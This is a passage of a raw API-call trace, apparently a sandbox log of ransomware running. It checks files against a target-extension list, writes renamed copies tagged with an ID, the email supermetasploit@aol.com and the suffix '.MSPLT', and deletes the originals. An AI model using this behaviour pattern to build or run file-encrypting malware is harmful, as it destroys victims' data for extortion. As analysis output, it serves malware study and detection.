(lpString1=".bz2", lpString2=".xml") returned -1 [0171.636] lstrlenW (lpString=".7z") returned 3 [0171.636] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0171.636] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml") returned 44 [0171.636] lstrlenW (lpString=".dbf") returned 4 [0171.636] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0171.636] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml") returned 44 [0171.636] lstrlenW (lpString=".1cd") returned 4 [0171.636] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0171.636] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml") returned 44 [0171.636] lstrlenW (lpString=".jpg") returned 4 [0171.636] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0171.636] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml") returned 44 [0171.636] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml") returned 44 [0171.636] lstrlenW (lpString=".doc") returned 4 [0171.636] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0171.636] lstrlenW (lpString=".docx") returned 5 [0171.636] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0171.636] lstrlenW (lpString=".pdf") returned 4 [0171.636] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0171.636] lstrlenW (lpString=".xls") returned 4 [0171.636] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0171.636] lstrlenW (lpString=".xlsx") returned 5 [0171.636] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0171.636] lstrlenW (lpString=".ppt") returned 4 [0171.637] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0171.637] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml") returned 44 [0171.637] lstrlenW (lpString=".zip") returned 4 [0171.637] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0171.637] lstrlenW (lpString=".rar") returned 4 [0171.637] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0171.637] lstrlenW (lpString=".bz2") returned 4 [0171.637] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0171.637] lstrlenW (lpString=".7z") returned 3 [0171.637] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0171.637] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml") returned 44 [0171.637] lstrlenW (lpString=".dbf") returned 4 [0171.637] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0171.637] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml") returned 44 [0171.637] lstrlenW (lpString=".1cd") returned 4 [0171.637] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0171.637] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml") returned 44 [0171.637] lstrlenW (lpString=".jpg") returned 4 [0171.637] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0171.637] lstrcmpiW (lpString1=".rtf", lpString2=".MSPLT") returned 1 [0171.637] lstrlenW (lpString="eula.rtf") returned 8 [0171.637] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1049\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1049\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0171.667] GetFileSizeEx (in: hFile=0x350, lpFileSize=0x25eff14 | out: lpFileSize=0x25eff14*=54456) returned 1 [0171.667] CloseHandle (hObject=0x350) returned 1 [0171.667] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1049\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1049\\eula.rtf")) returned 0x80 [0171.667] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1049\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1049\\eula.rtf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0171.668] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1049\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1049\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0171.668] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0171.668] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0171.668] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1049\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1049\\eula.rtf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x364 [0171.685] GetLastError () returned 0x0 [0171.685] ReadFile (in: hFile=0x350, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0xd4b8, lpOverlapped=0x0) returned 1 [0171.735] WriteFile (in: hFile=0x364, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0xd4c0, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0xd4c0, lpOverlapped=0x0) returned 1 [0171.738] ReadFile (in: hFile=0x350, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x0, lpOverlapped=0x0) returned 1 [0171.738] WriteFile (in: hFile=0x364, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0xe4, lpOverlapped=0x0) returned 1 [0171.738] SetEndOfFile (hFile=0x364) returned 1 [0171.738] CloseHandle (hObject=0x364) returned 1 [0171.748] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0171.749] SetEndOfFile (hFile=0x350) returned 1 [0171.770] CloseHandle (hObject=0x350) returned 1 [0171.770] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1049\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0171.772] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1049\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1049\\eula.rtf")) returned 1 [0171.773] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\eula.rtf") returned 35 [0171.773] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\eula.rtf") returned 35 [0171.773] lstrlenW (lpString=".doc") returned 4 [0171.773] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0171.773] lstrlenW (lpString=".docx") returned 5 [0171.773] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0171.773] lstrlenW (lpString=".pdf") returned 4 [0171.773] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0171.773] lstrlenW (lpString=".xls") returned 4 [0171.773] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0171.773] lstrlenW (lpString=".xlsx") returned 5 [0171.773] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0171.773] lstrlenW (lpString=".ppt") returned 4 [0171.773] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0171.773] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\eula.rtf") returned 35 [0171.773] lstrlenW (lpString=".zip") returned 4 [0171.773] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0171.773] lstrlenW (lpString=".rar") returned 4 [0171.773] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0171.773] lstrlenW (lpString=".bz2") returned 4 [0171.773] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0171.773] lstrlenW (lpString=".7z") returned 3 [0171.773] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0171.773] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\eula.rtf") returned 35 [0171.773] lstrlenW (lpString=".dbf") returned 4 [0171.773] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0171.773] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\eula.rtf") returned 35 [0171.775] lstrlenW (lpString=".1cd") returned 4 [0171.775] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0171.775] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\eula.rtf") returned 35 [0171.775] lstrlenW (lpString=".jpg") returned 4 [0171.775] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0171.775] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\eula.rtf") returned 35 [0171.775] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\eula.rtf") returned 35 [0171.775] lstrlenW (lpString=".doc") returned 4 [0171.775] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0171.775] lstrlenW (lpString=".docx") returned 5 [0171.775] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0171.775] lstrlenW (lpString=".pdf") returned 4 [0171.775] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0171.775] lstrlenW (lpString=".xls") returned 4 [0171.775] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0171.775] lstrlenW (lpString=".xlsx") returned 5 [0171.775] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0171.775] lstrlenW (lpString=".ppt") returned 4 [0171.775] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0171.776] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\eula.rtf") returned 35 [0171.776] lstrlenW (lpString=".zip") returned 4 [0171.776] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0171.776] lstrlenW (lpString=".rar") returned 4 [0171.776] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0171.776] lstrlenW (lpString=".bz2") returned 4 [0171.776] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0171.776] lstrlenW (lpString=".7z") returned 3 [0171.776] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0171.776] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\eula.rtf") returned 35 [0171.776] lstrlenW (lpString=".dbf") returned 4 [0171.776] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0171.776] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\eula.rtf") returned 35 [0171.776] lstrlenW (lpString=".1cd") returned 4 [0171.776] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0171.776] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\eula.rtf") returned 35 [0171.776] lstrlenW (lpString=".jpg") returned 4 [0171.776] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0171.776] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0171.776] lstrlenW (lpString="LocalizedData.xml") returned 17 [0171.777] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1055\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0172.444] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x25eff14 | out: lpFileSize=0x25eff14*=76818) returned 1 [0172.444] CloseHandle (hObject=0x344) returned 1 [0172.444] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1055\\localizeddata.xml")) returned 0x80 [0172.444] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1055\\localizeddata.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0172.484] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1055\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0172.484] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0172.484] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0172.484] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1055\\localizeddata.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0172.484] GetLastError () returned 0x0 [0172.484] ReadFile (in: hFile=0x384, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x12c12, lpOverlapped=0x0) returned 1 [0172.488] WriteFile (in: hFile=0x344, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0x12c20, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0x12c20, lpOverlapped=0x0) returned 1 [0172.491] ReadFile (in: hFile=0x384, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x0, lpOverlapped=0x0) returned 1 [0172.491] WriteFile (in: hFile=0x344, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0xf6, lpOverlapped=0x0) returned 1 [0172.491] SetEndOfFile (hFile=0x344) returned 1 [0172.491] CloseHandle (hObject=0x344) returned 1 [0172.495] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0172.495] SetEndOfFile (hFile=0x384) returned 1 [0172.496] CloseHandle (hObject=0x384) returned 1 [0172.496] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0172.498] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1055\\localizeddata.xml")) returned 1 [0172.499] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml") returned 44 [0172.499] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml") returned 44 [0172.499] lstrlenW (lpString=".doc") returned 4 [0172.499] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0172.499] lstrlenW (lpString=".docx") returned 5 [0172.499] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0172.499] lstrlenW (lpString=".pdf") returned 4 [0172.499] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0172.499] lstrlenW (lpString=".xls") returned 4 [0172.499] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0172.499] lstrlenW (lpString=".xlsx") returned 5 [0172.499] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0172.499] lstrlenW (lpString=".ppt") returned 4 [0172.499] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0172.499] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml") returned 44 [0172.499] lstrlenW (lpString=".zip") returned 4 [0172.499] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0172.499] lstrlenW (lpString=".rar") returned 4 [0172.499] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0172.499] lstrlenW (lpString=".bz2") returned 4 [0172.499] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0172.499] lstrlenW (lpString=".7z") returned 3 [0172.499] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0172.499] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml") returned 44 [0172.499] lstrlenW (lpString=".dbf") returned 4 [0172.499] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0172.499] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml") returned 44 [0172.499] lstrlenW (lpString=".1cd") returned 4 [0172.500] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0172.500] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml") returned 44 [0172.500] lstrlenW (lpString=".jpg") returned 4 [0172.500] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0172.500] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml") returned 44 [0172.500] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml") returned 44 [0172.500] lstrlenW (lpString=".doc") returned 4 [0172.500] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0172.500] lstrlenW (lpString=".docx") returned 5 [0172.500] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0172.500] lstrlenW (lpString=".pdf") returned 4 [0172.500] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0172.500] lstrlenW (lpString=".xls") returned 4 [0172.500] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0172.500] lstrlenW (lpString=".xlsx") returned 5 [0172.500] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0172.500] lstrlenW (lpString=".ppt") returned 4 [0172.500] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0172.500] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml") returned 44 [0172.500] lstrlenW (lpString=".zip") returned 4 [0172.500] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0172.500] lstrlenW (lpString=".rar") returned 4 [0172.500] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0172.500] lstrlenW (lpString=".bz2") returned 4 [0172.500] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0172.500] lstrlenW (lpString=".7z") returned 3 [0172.501] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0172.501] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml") returned 44 [0172.501] lstrlenW (lpString=".dbf") returned 4 [0172.501] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0172.501] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml") returned 44 [0172.501] lstrlenW (lpString=".1cd") returned 4 [0172.501] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0172.501] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml") returned 44 [0172.501] lstrlenW (lpString=".jpg") returned 4 [0172.501] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0172.501] lstrcmpiW (lpString1=".rtf", lpString2=".MSPLT") returned 1 [0172.501] lstrlenW (lpString="eula.rtf") returned 8 [0172.501] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3082\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\3082\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0172.501] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x25eff14 | out: lpFileSize=0x25eff14*=3069) returned 1 [0172.502] CloseHandle (hObject=0x384) returned 1 [0172.502] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\3082\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\3082\\eula.rtf")) returned 0x80 [0172.502] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\3082\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\3082\\eula.rtf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0172.502] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3082\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\3082\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0172.502] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0172.502] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0172.502] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3082\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\3082\\eula.rtf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0172.503] GetLastError () returned 0x0 [0172.503] ReadFile (in: hFile=0x384, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0xbfd, lpOverlapped=0x0) returned 1 [0172.505] WriteFile (in: hFile=0x344, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0xc00, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0xc00, lpOverlapped=0x0) returned 1 [0172.506] ReadFile (in: hFile=0x384, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x0, lpOverlapped=0x0) returned 1 [0172.507] WriteFile (in: hFile=0x344, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0xe4, lpOverlapped=0x0) returned 1 [0172.507] SetEndOfFile (hFile=0x344) returned 1 [0172.507] CloseHandle (hObject=0x344) returned 1 [0172.509] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0172.509] SetEndOfFile (hFile=0x384) returned 1 [0172.510] CloseHandle (hObject=0x384) returned 1 [0172.510] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\3082\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0172.510] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\3082\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\3082\\eula.rtf")) returned 1 [0172.510] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\eula.rtf") returned 35 [0172.510] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\eula.rtf") returned 35 [0172.510] lstrlenW (lpString=".doc") returned 4 [0172.510] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0172.510] lstrlenW (lpString=".docx") returned 5 [0172.510] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0172.510] lstrlenW (lpString=".pdf") returned 4 [0172.510] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0172.510] lstrlenW (lpString=".xls") returned 4 [0172.510] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0172.510] lstrlenW (lpString=".xlsx") returned 5 [0172.510] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0172.510] lstrlenW (lpString=".ppt") returned 4 [0172.511] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0172.511] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\eula.rtf") returned 35 [0172.511] lstrlenW (lpString=".zip") returned 4 [0172.511] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0172.511] lstrlenW (lpString=".rar") returned 4 [0172.511] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0172.511] lstrlenW (lpString=".bz2") returned 4 [0172.511] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0172.511] lstrlenW (lpString=".7z") returned 3 [0172.511] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0172.511] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\eula.rtf") returned 35 [0172.511] lstrlenW (lpString=".dbf") returned 4 [0172.511] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0172.511] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\eula.rtf") returned 35 [0172.511] lstrlenW (lpString=".1cd") returned 4 [0172.511] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0172.511] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\eula.rtf") returned 35 [0172.511] lstrlenW (lpString=".jpg") returned 4 [0172.511] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0172.511] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\eula.rtf") returned 35 [0172.511] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\eula.rtf") returned 35 [0172.511] lstrlenW (lpString=".doc") returned 4 [0172.511] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0172.511] lstrlenW (lpString=".docx") returned 5 [0172.511] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0172.511] lstrlenW (lpString=".pdf") returned 4 [0172.511] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0172.511] lstrlenW (lpString=".xls") returned 4 [0172.511] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0172.511] lstrlenW (lpString=".xlsx") returned 5 [0172.511] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0172.511] lstrlenW (lpString=".ppt") returned 4 [0172.511] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0172.512] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\eula.rtf") returned 35 [0172.512] lstrlenW (lpString=".zip") returned 4 [0172.512] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0172.512] lstrlenW (lpString=".rar") returned 4 [0172.512] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0172.512] lstrlenW (lpString=".bz2") returned 4 [0172.512] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0172.512] lstrlenW (lpString=".7z") returned 3 [0172.512] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0172.512] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\eula.rtf") returned 35 [0172.512] lstrlenW (lpString=".dbf") returned 4 [0172.512] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0172.512] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\eula.rtf") returned 35 [0172.512] lstrlenW (lpString=".1cd") returned 4 [0172.512] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0172.512] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\eula.rtf") returned 35 [0172.512] lstrlenW (lpString=".jpg") returned 4 [0172.512] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0172.512] lstrcmpiW 